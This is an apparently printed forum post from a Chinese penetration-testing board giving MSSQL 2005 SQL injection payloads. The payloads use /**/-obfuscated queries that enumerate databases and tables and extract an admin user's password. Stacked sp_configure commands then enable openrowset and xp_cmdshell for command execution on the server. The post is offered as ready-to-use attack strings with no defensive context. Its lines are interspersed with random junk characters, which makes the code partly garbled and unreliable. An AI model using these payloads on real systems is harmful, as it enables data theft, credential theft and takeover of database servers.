中国网络渗透测试联盟

标题: MSsql2005注入语句 [打印本页]

作者: admin    时间: 2012-9-13 17:19
标题: MSsql2005注入语句
8 t9 v6 M  k& q/ d
0 H' Q( k- L, A% u6 F7 z7 C
' m' i, o3 R; D  u
[Copy to clipboard]CODE:2 c" r/ i  K: q4 _& f$ [8 p. d
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--# ~- L/ _6 {, I5 L' ~8 i$ v- E
/ s  s/ {  H* M6 Y
爆表语句,somedb部份是所要列的数据库,红色数字1累加
8 Q! L  I$ _& h1 z8 Q- ^4 E2 v
* D: F- W! q0 [
: a" G* Z' y8 R% w# Z" d/ ]; X" f[Copy to clipboard]CODE:
6 I4 Z' p8 F& B/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--# }7 S$ }- B6 ]) X! f; O) |& z
+ u$ s( |7 Q7 e
爆字段语句,爆表admin里user='icerover'的密码段( ~4 i1 l' W" ]& J( U
! j; J  |6 V, Z0 O  F7 M' l

4 M4 Q  ~/ X0 v3 |[Copy to clipboard]CODE:
9 p2 O% L, P" |" v* w" A**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--# A4 T6 [' m( [& T5 z

: @3 Q2 w1 l' [- P4 [/ A- Smssql2005默认没有开xp_cmdshell的,openrowset也不能用4 M3 i" M: e% ]
如果是sa权限,可以这样来开启
! l/ r# Y4 i- \- J( x开启openrowset: g# d+ Q  r# c( y
$ @! u4 l, E9 Y8 M, z

& h/ ~2 O) y+ |4 t# K) g2 j[Copy to clipboard]CODE:
  [+ Y7 M5 p, l. k) I  ~. u3 [/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--1 k) c8 A& G6 D1 H" j( I" R
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--3 O8 p6 X" J: ^, x

* u8 l$ w" T' ]7 z2 Z0 }% i开启xp_cmdshell2 I% P3 {$ \, i2 ?0 U, @' g

- G2 q- y: k' @# K- J1 T8 S& x9 |' _# x- ]+ l! R
[Copy to clipboard]CODE:
" h/ u3 h4 s7 g" z. pEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--! j3 H4 a1 [/ I/ W6 F
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--! }! z' b' ?% u6 }) `. p
/ T: k. u$ }! t4 y
ok,over~~晚安# D" C- e0 w8 s% n1 |: c$ M





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2